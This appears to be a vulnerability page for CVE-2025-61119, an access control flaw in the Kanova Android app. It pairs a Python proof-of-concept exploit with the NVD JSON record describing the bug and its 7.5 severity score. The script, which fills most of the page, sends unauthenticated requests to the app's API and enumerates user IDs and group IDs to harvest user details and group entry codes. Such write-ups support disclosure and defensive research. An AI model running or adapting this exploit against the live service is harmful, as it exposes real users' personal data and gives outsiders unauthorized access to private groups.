CVE-2025-61119

import requests import json # CVE-2025-61119 PoC - Kanova Android App IDOR Vulnerability # Target: Kanova Android App API endpoints # Vulnerability: Improper Access Control / IDOR TARGET_URL = "https://api.kanova-app.com" VULNERABLE_USER_ENDPOINT = "/api/v1/users/{user_id}" VULNERABLE_GROUP_ENDPOINT = "/api/v1/groups/{group_id}" def exploit_user_info(user_id): """Exploit to retrieve user details by manipulating user_id parameter""" endpoint = VULNERABLE_USER_ENDPOINT.format(user_id=user_id) url = TARGET_URL + endpoint headers = { "User-Agent": "Kanova/1.0.27 Android", "Content-Type": "application/json", "Authorization": "Bearer anonymous" # No valid auth required } try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: return response.json() except Exception as e: print(f"Error: {e}") return None def exploit_group_info(group_id): """Exploit to retrieve group information including entry codes""" endpoint = VULNERABLE_GROUP_ENDPOINT.format(group_id=group_id) url = TARGET_URL + endpoint headers = { "User-Agent": "Kanova/1.0.27 Android", "Content-Type": "application/json", "Authorization": "Bearer anonymous" } try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: return response.json() except Exception as e: print(f"Error: {e}") return None # Example usage if __name__ == "__main__": # Enumerate users for user_id in range(1, 100): user_data = exploit_user_info(user_id) if user_data: print(f"User {user_id}: {json.dumps(user_data, indent=2)}") # Enumerate groups for group_id in range(1, 50): group_data = exploit_group_info(group_id) if group_data: print(f"Group {group_id}: {json.dumps(group_data, indent=2)}")

{"cve": {"id": "CVE-2025-61119", "sourceIdentifier": "[email protected]", "published": "2025-10-30T17:15:39.123", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kanova Android App version 1.0.27 (package name com.karelane), developed by Karely L.L.C., contains improper access control vulnerabilities. Attackers may gain unauthorized access to user details and obtain group information, including entry codes, by manipulating API request parameters. Successful exploitation could result in privacy breaches, unauthorized group access, and misuse of the platform."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://kar1oz.notion.site/Kanova-2629a473ecb2801bac89ce99d0b30df7", "source": "[email protected]"}]}}